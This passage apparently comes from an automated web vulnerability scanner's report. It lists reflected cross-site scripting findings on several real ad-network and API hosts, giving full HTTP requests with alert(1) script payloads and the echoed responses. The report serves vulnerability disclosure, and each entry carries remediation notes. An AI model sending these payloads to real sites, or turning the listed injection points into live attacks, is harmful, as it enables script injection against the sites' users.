The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d5b"-alert(1)-"4f51d7bed73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&b0d5b"-alert(1)-"4f51d7bed73=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599382601;key=key1+key2+key3+key4;nodecode=yes;link=&b0d5b"-alert(1)-"4f51d7bed73=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...
4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7beee'-alert(1)-'f8a39a000c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&7beee'-alert(1)-'f8a39a000c8=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599384152;key=key1+key2+key3+key4;nodecode=yes;link=&7beee'-alert(1)-'f8a39a000c8=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...
4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44b21"-alert(1)-"24010b6fd5a was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=44b21"-alert(1)-"24010b6fd5a HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599803020;key=key1+key2+key3+key4;nodecode=yes;link=44b21"-alert(1)-"24010b6fd5a") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...
4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5b2a'-alert(1)-'76580ad7740 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=f5b2a'-alert(1)-'76580ad7740 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599805634;key=key1+key2+key3+key4;nodecode=yes;link=f5b2a'-alert(1)-'76580ad7740')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...
4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca286"-alert(1)-"e3c10b470be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&ca286"-alert(1)-"e3c10b470be=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599813136;key=key1+key2+key3+key4;nodecode=yes;link=&ca286"-alert(1)-"e3c10b470be=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...
4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fff1'-alert(1)-'90730b7d240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&8fff1'-alert(1)-'90730b7d240=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599814481;key=key1+key2+key3+key4;nodecode=yes;link=&8fff1'-alert(1)-'90730b7d240=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...
4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 62f3a<script>alert(1)</script>1d58073aa6e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 03 Oct 2011 00:13:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=626db0cb-3cd9-459b-b19f-8fbed9cce7e8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e)
4.20. http://api.wipmania.com/jsonp [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d34b6<script>alert(1)</script>48f0c9a2585 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonp?callback=jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585&_=1317602106543 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 198

jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})
4.21. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8dc7c<script>alert(1)</script>a181b15a895 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895&n=ar_int_p119936314&1317599990670 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895("");
4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b14f"><script>alert(1)</script>63d7f247e9a was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9dedf6fa7c3e35355f673e63293624ee42b80e94"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:49 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:49 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:49 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
on&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...
4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5ee"><script>alert(1)</script>a99bc9549b1 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "5b2700f3bc17003c1b06ba969270be02e1b1af91"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:55 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:55 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:55 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
27704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...
4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14194"><script>alert(1)</script>1438e1bd2b4 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "94e76ad5f7c529cdda89711f9bf9ce49199412b1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:59 GMT
Content-Length: 2364
Connection: close
